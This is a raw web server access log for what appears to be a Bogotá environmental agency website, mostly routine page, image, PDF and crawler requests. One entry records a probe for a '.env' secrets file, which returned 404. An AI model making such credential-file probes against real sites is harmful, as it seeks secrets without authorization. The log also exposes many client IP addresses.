69.63.189.1 - - [24/Jun/2023:21:02:34 -0500] "GET /images/serpiente-sabanera.jpeg HTTP/1.1" 200 167272
69.63.189.1 - - [24/Jun/2023:21:02:34 -0500] "GET /images/stand-secretaria-ambiente-fima.jpg HTTP/1.1" 200 42537
69.63.189.116 - - [24/Jun/2023:21:02:49 -0500] "GET /images/manos-reparadoras-plaza-americas-1.jpg HTTP/1.1" 200 47593
69.63.189.116 - - [24/Jun/2023:21:02:49 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
3.137.198.173 - - [24/Jun/2023:21:02:50 -0500] "GET /ai.txt?t=1687655048.764337 HTTP/1.1" 404 1018
3.137.198.173 - - [24/Jun/2023:21:02:50 -0500] "GET /.well-known/ai.txt?t=1687655048.764337 HTTP/1.1" 404 1018
201.245.192.253 - - [24/Jun/2023:21:02:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:21:04:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.79.1 - - [24/Jun/2023:21:05:53 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
216.245.221.92 - - [24/Jun/2023:21:06:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:04:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
201.245.192.253 - - [24/Jun/2023:21:07:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
82.64.48.200 - - [24/Jun/2023:21:08:21 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [24/Jun/2023:21:11:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:09:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:11:44 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1043
172.22.2.4 - - [24/Jun/2023:21:11:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [24/Jun/2023:21:10:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47717
172.22.2.4 - - [24/Jun/2023:21:11:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [24/Jun/2023:21:12:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
216.245.221.92 - - [24/Jun/2023:21:16:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:15:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:21:17:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:21:16:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
52.167.144.55 - - [24/Jun/2023:21:18:16 -0500] "-" 408 -
45.156.129.37 - - [24/Jun/2023:21:18:32 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [24/Jun/2023:21:19:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42829
201.245.192.253 - - [24/Jun/2023:21:19:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43471
216.245.221.92 - - [24/Jun/2023:21:21:20 -0500] "HEAD / HTTP/1.1" 200 -
190.90.86.18 - - [24/Jun/2023:21:22:31 -0500] "GET /mas-de-100-arboles-fueron-plantados-en-el-humedal-de-techo.html HTTP/1.1" 200 750
201.245.192.253 - - [24/Jun/2023:21:22:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:21:21:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:22:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
66.249.70.196 - - [24/Jun/2023:21:24:31 -0500] "-" 408 -
69.171.251.2 - - [24/Jun/2023:21:24:32 -0500] "GET /serpiente-sabanera-pone-huevos-en-area-protegida-de-bogota.html HTTP/1.1" 206 670
216.245.221.92 - - [24/Jun/2023:21:26:20 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.8 - - [24/Jun/2023:21:27:04 -0500] "HEAD /mas-de-100-arboles-fueron-plantados-en-el-humedal-de-techo.html HTTP/1.1" 206 -
201.245.192.253 - - [24/Jun/2023:21:27:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
173.252.107.7 - - [24/Jun/2023:21:27:49 -0500] "GET /images/camara-trampa.jpeg HTTP/1.1" 200 77809
173.252.107.3 - - [24/Jun/2023:21:27:49 -0500] "GET /images/aire-bogota.jpeg HTTP/1.1" 200 169194
173.252.107.5 - - [24/Jun/2023:21:27:52 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
173.252.107.112 - - [24/Jun/2023:21:27:52 -0500] "GET /images/manos-reparadoras-plaza-americas-1.jpg HTTP/1.1" 200 47593
172.22.2.4 - - [24/Jun/2023:21:27:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:21:29:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42829
172.22.2.4 - - [24/Jun/2023:21:28:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [24/Jun/2023:21:29:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43471
52.167.144.66 - - [24/Jun/2023:21:30:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2023%2F HTTP/1.1" 200 121096
52.167.144.55 - - [24/Jun/2023:21:30:48 -0500] "-" 408 -
52.167.144.60 - - [24/Jun/2023:21:30:49 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
216.245.221.92 - - [24/Jun/2023:21:31:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:21:32:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
52.167.144.39 - - [24/Jun/2023:21:33:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0015.pdf HTTP/1.1" 200 486671
172.22.2.4 - - [24/Jun/2023:21:33:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53643
172.22.2.4 - - [24/Jun/2023:21:33:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:35:11 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%204%20del%2028%20de%20Junio%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [24/Jun/2023:21:34:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54453
66.249.66.77 - - [24/Jun/2023:21:36:00 -0500] "-" 408 -
216.245.221.92 - - [24/Jun/2023:21:36:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:37:00 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [24/Jun/2023:21:37:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
13.214.92.255 - - [24/Jun/2023:21:39:12 -0500] "GET /galeria/nivo-slider/demo/convocatorias.html? HTTP/1.1" 200 3464
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/demo/images/bannerconvocatoriaacercar.jpg HTTP/1.1" 200 91528
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
13.214.92.255 - - [24/Jun/2023:21:39:13 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
201.245.192.253 - - [24/Jun/2023:21:39:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42829
201.245.192.253 - - [24/Jun/2023:21:39:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43471
172.22.2.4 - - [24/Jun/2023:21:39:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Jun/2023:21:41:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:39:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56100
173.252.107.2 - - [24/Jun/2023:21:41:46 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
173.252.107.117 - - [24/Jun/2023:21:42:03 -0500] "GET /bogota-tendra-una-nueva-reciclaton-empresarial.html HTTP/1.1" 200 886
173.252.107.111 - - [24/Jun/2023:21:42:03 -0500] "GET /bogota-tendra-una-nueva-reciclaton-empresarial.html HTTP/1.1" 200 886
173.252.87.116 - - [24/Jun/2023:21:42:04 -0500] "GET /images/reciclaton-mayo-3-mayo.jpg HTTP/1.1" 200 278453
69.171.231.5 - - [24/Jun/2023:21:42:13 -0500] "GET /images/llantaton-jornada.jpg HTTP/1.1" 200 356045
201.245.192.253 - - [24/Jun/2023:21:42:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
34.223.22.103 - - [24/Jun/2023:21:45:18 -0500] "GET /galeria/galeria/fotos/Humedal-techo1P.jpg HTTP/1.1" 200 33428
173.252.107.4 - - [24/Jun/2023:21:45:42 -0500] "HEAD /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 206 -
216.245.221.92 - - [24/Jun/2023:21:46:20 -0500] "HEAD / HTTP/1.1" 200 -
186.29.35.138 - - [24/Jun/2023:21:46:22 -0500] "GET /mas-de-100-arboles-fueron-plantados-en-el-humedal-de-techo.html HTTP/1.1" 200 750
172.22.2.4 - - [24/Jun/2023:21:44:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.184.116 - - [24/Jun/2023:21:47:07 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
69.63.184.116 - - [24/Jun/2023:21:47:07 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html HTTP/1.1" 200 818
172.22.2.4 - - [24/Jun/2023:21:45:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53248
201.245.192.253 - - [24/Jun/2023:21:47:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
190.121.136.167 - - [24/Jun/2023:21:48:16 -0500] "GET /acuerdos-de-conservacion-camaras-trampa-registran-fauna-en-la-reserva-umbral-cultural-horizontes.html?fbclid=IwAR2_Dv8AMzxvhsMlkddWz8NGXgq5SVHY9hwfheP4_PXxICuU6RT4_8wJ-ug HTTP/1.1" 200 818
66.249.84.193 - - [24/Jun/2023:21:48:39 -0500] "GET /mujeres-secretaria-de-ambiente-abre-nueva-convocatoria-para-aprender-sobre-el-cuidado-de-los-humedales.html HTTP/1.1" 200 853
172.22.2.4 - - [24/Jun/2023:21:48:40 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7496
172.22.2.4 - - [24/Jun/2023:21:48:40 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [24/Jun/2023:21:48:40 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
64.233.172.40 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
64.233.172.41 - - [24/Jun/2023:21:48:41 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
64.233.172.41 - - [24/Jun/2023:21:48:41 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
74.125.210.198 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
74.125.210.196 - - [24/Jun/2023:21:48:41 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
74.125.210.198 - - [24/Jun/2023:21:48:41 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [24/Jun/2023:21:48:41 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [24/Jun/2023:21:48:42 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [24/Jun/2023:21:48:42 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [24/Jun/2023:21:48:42 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [24/Jun/2023:21:48:42 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [24/Jun/2023:21:48:42 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [24/Jun/2023:21:48:42 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [24/Jun/2023:21:48:42 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1238
64.233.172.41 - - [24/Jun/2023:21:48:46 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
64.233.172.42 - - [24/Jun/2023:21:48:46 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
64.233.172.42 - - [24/Jun/2023:21:48:46 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
64.233.172.40 - - [24/Jun/2023:21:48:46 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
64.233.172.42 - - [24/Jun/2023:21:48:46 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
64.233.172.40 - - [24/Jun/2023:21:48:46 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
64.233.172.42 - - [24/Jun/2023:21:48:46 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
64.233.172.42 - - [24/Jun/2023:21:48:47 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
64.233.172.41 - - [24/Jun/2023:21:48:47 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
64.233.172.42 - - [24/Jun/2023:21:48:47 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
64.233.172.40 - - [24/Jun/2023:21:48:47 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
66.249.70.197 - - [24/Jun/2023:21:48:47 -0500] "-" 408 -
64.233.172.42 - - [24/Jun/2023:21:48:47 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
64.233.172.42 - - [24/Jun/2023:21:48:47 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
64.233.172.40 - - [24/Jun/2023:21:48:47 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
64.233.172.42 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
64.233.172.42 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
64.233.172.41 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
64.233.172.42 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
64.233.172.42 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
64.233.172.42 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
64.233.172.41 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
64.233.172.40 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
64.233.172.42 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
64.233.172.40 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
64.233.172.40 - - [24/Jun/2023:21:48:48 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
64.233.172.41 - - [24/Jun/2023:21:48:49 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
64.233.172.40 - - [24/Jun/2023:21:48:49 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
172.22.2.4 - - [24/Jun/2023:21:48:49 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
64.233.172.42 - - [24/Jun/2023:21:48:51 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
64.233.172.41 - - [24/Jun/2023:21:48:51 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
128.199.26.241 - - [24/Jun/2023:21:49:01 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [24/Jun/2023:21:51:20 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.60 - - [24/Jun/2023:21:51:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0228.pdf HTTP/1.1" 304 -
172.22.2.4 - - [24/Jun/2023:21:50:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:21:52:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:21:51:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56816
69.63.189.8 - - [24/Jun/2023:21:54:39 -0500] "GET /secretaria-de-ambiente-presenta-cartilla-con-el-protocolo-para-el-manejo-y-control-de-la-langostilla-de-rio.html HTTP/1.1" 200 857
69.63.189.5 - - [24/Jun/2023:21:54:39 -0500] "GET /secretaria-de-ambiente-presenta-cartilla-con-el-protocolo-para-el-manejo-y-control-de-la-langostilla-de-rio.html HTTP/1.1" 200 857
172.22.2.4 - - [24/Jun/2023:21:55:18 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
66.249.70.196 - - [24/Jun/2023:21:55:40 -0500] "-" 408 -
216.245.221.92 - - [24/Jun/2023:21:56:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:21:57:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:21:56:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:21:57:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43795
172.22.2.4 - - [24/Jun/2023:21:57:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45662
172.22.2.4 - - [24/Jun/2023:21:59:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61779
172.22.2.4 - - [24/Jun/2023:22:00:51 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
216.245.221.92 - - [24/Jun/2023:22:01:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:01:31 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
201.245.192.253 - - [24/Jun/2023:22:02:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
172.22.2.4 - - [24/Jun/2023:22:03:01 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [24/Jun/2023:22:03:02 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 4657752
172.22.2.4 - - [24/Jun/2023:22:02:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:03:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
186.31.119.138 - - [24/Jun/2023:22:05:36 -0500] "-" 408 -
216.245.221.92 - - [24/Jun/2023:22:06:20 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.66 - - [24/Jun/2023:22:07:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/5167.pdf HTTP/1.1" 304 -
201.245.192.253 - - [24/Jun/2023:22:07:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
66.249.70.196 - - [24/Jun/2023:22:09:01 -0500] "-" 408 -
172.22.2.4 - - [24/Jun/2023:22:08:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.75 - - [24/Jun/2023:22:10:36 -0500] "-" 408 -
172.22.2.4 - - [24/Jun/2023:22:09:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55739
216.245.221.92 - - [24/Jun/2023:22:11:20 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.120 - - [24/Jun/2023:22:12:09 -0500] "GET /mas-de-150-arboles-plantados-en-los-ultimos-dias-en-bogota.html HTTP/1.1" 200 848
172.22.2.4 - - [24/Jun/2023:22:12:15 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
201.245.192.253 - - [24/Jun/2023:22:12:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
190.249.17.208 - - [24/Jun/2023:22:12:57 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html?fbclid=IwAR0jaYhgtqepKkdir0JEhuE2Li4lflGqPjz5K87eH8V8-lfJSAi0Y-88ozg HTTP/1.1" 200 795
173.252.95.11 - - [24/Jun/2023:22:13:23 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
173.252.95.9 - - [24/Jun/2023:22:13:37 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 200 943
173.252.95.2 - - [24/Jun/2023:22:13:51 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 206 943
190.249.17.208 - - [24/Jun/2023:22:13:52 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html?fbclid=IwAR23h_YQEntyl_ux0f46eRinwhkPAnD3CqgimtIuIg02qPEI9Sl3PCUJe5A HTTP/1.1" 200 795
52.167.144.66 - - [24/Jun/2023:22:15:16 -0500] "GET /BLA/boletinlegal/images/nuevo.gif HTTP/1.1" 200 26475
172.22.2.4 - - [24/Jun/2023:22:14:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Jun/2023:22:16:20 -0500] "HEAD / HTTP/1.1" 200 -
192.155.90.118 - - [24/Jun/2023:22:16:29 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [24/Jun/2023:22:14:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
52.167.144.39 - - [24/Jun/2023:22:17:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0092.pdf HTTP/1.1" 200 485061
201.245.192.253 - - [24/Jun/2023:22:17:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
18.119.166.37 - - [24/Jun/2023:22:17:59 -0500] "GET /ai.txt?t=1687655049.160372 HTTP/1.1" 404 1035
18.119.166.37 - - [24/Jun/2023:22:17:59 -0500] "GET /.well-known/ai.txt?t=1687655049.160372 HTTP/1.1" 404 1035
201.245.192.253 - - [24/Jun/2023:22:19:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42979
201.245.192.253 - - [24/Jun/2023:22:19:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43473
173.252.83.9 - - [24/Jun/2023:22:19:57 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
216.245.221.92 - - [24/Jun/2023:22:21:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:19:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
159.223.30.219 - - [24/Jun/2023:22:21:42 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Jun/2023:22:20:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
201.245.192.253 - - [24/Jun/2023:22:22:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
173.252.79.4 - - [24/Jun/2023:22:23:50 -0500] "GET /serpiente-sabanera-pone-huevos-en-area-protegida-de-bogota.html HTTP/1.1" 206 670
216.245.221.92 - - [24/Jun/2023:22:26:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Jun/2023:22:25:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2023:22:27:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40807
